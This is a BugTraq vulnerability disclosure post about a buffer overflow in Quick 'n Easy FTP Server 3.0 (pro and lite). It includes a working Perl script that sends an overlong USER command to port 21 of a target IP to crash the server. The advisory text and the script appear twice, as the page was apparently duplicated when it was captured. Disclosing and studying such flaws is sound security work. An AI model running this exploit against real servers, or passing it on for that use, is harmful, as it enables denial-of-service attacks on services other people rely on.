BugTraq
Back to list
|
Post reply
Quick 'n Easy FTP Server 3.0 pro / lite (buffer overflow vulnerabilities)
Aug 02 2005 01:58PM
matiteman securityfocus com, "[at]" securityfocus com,hotmail com securityfocus com
Details:
========
Input to the user commands is not properly checked
and/or filtered. Issuing a long argument to the user (about 1024 caracteres)
commands will cause the corresponding process to die without any error message.
this vulnerabilities exist in both the professionnal version 3.0 and lite version 3.0
Exploits:
========
Run the following PERL script against the server. The corresponding
process will die.
#=====testserver.pl =====
#
# Usage: testserver.pl <ip>
# testserver.pl 127.0.0.1
# bug discovered by : matiteman
# exploit coded by : matiteman
# thanks to : Reed Arvin (peachfuzz)
# Quick 'n Easy FTP Server 3.0 (pro and lite)
# Download:
# http://www.pablosoftwaresolutions.com/
#
##########################################
use IO::Socket;
use strict;
my($socket) = "";
if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => "21",
Proto => "TCP"))
{
print "Attempting to kill Quick 'n Easy FTP Server 3.0 (pro / lite) at $ARGV[0]:21...\n";
sleep(1);
print $socket "user " . "A" x 1024 . "\r\n";
sleep(1);
close($socket);
}
else
{
print "Cannot connect to $ARGV[0]:21\n";
}
#===== testserver.pl =====
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
========
Input to the user commands is not properly checked
and/or filtered. Issuing a long argument to the user (about 1024 caracteres)
commands will cause the corresponding process to die without any error message.
this vulnerabilities exist in both the professionnal version 3.0 and lite version 3.0
Exploits:
========
Run the following PERL script against the server. The corresponding
process will die.
#=====testserver.pl =====
#
# Usage: testserver.pl <ip>
# testserver.pl 127.0.0.1
# bug discovered by : matiteman
# exploit coded by : matiteman
# thanks to : Reed Arvin (peachfuzz)
# Quick 'n Easy FTP Server 3.0 (pro and lite)
# Download:
# http://www.pablosoftwaresolutions.com/
#
##########################################
use IO::Socket;
use strict;
my($socket) = "";
if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => "21",
Proto => "TCP"))
{
print "Attempting to kill Quick 'n Easy FTP Server 3.0 (pro / lite) at $ARGV[0]:21...\n";
sleep(1);
print $socket "user " . "A" x 1024 . "\r\n";
sleep(1);
close($socket);
}
else
{
print "Cannot connect to $ARGV[0]:21\n";
}
#===== testserver.pl =====
[ reply ]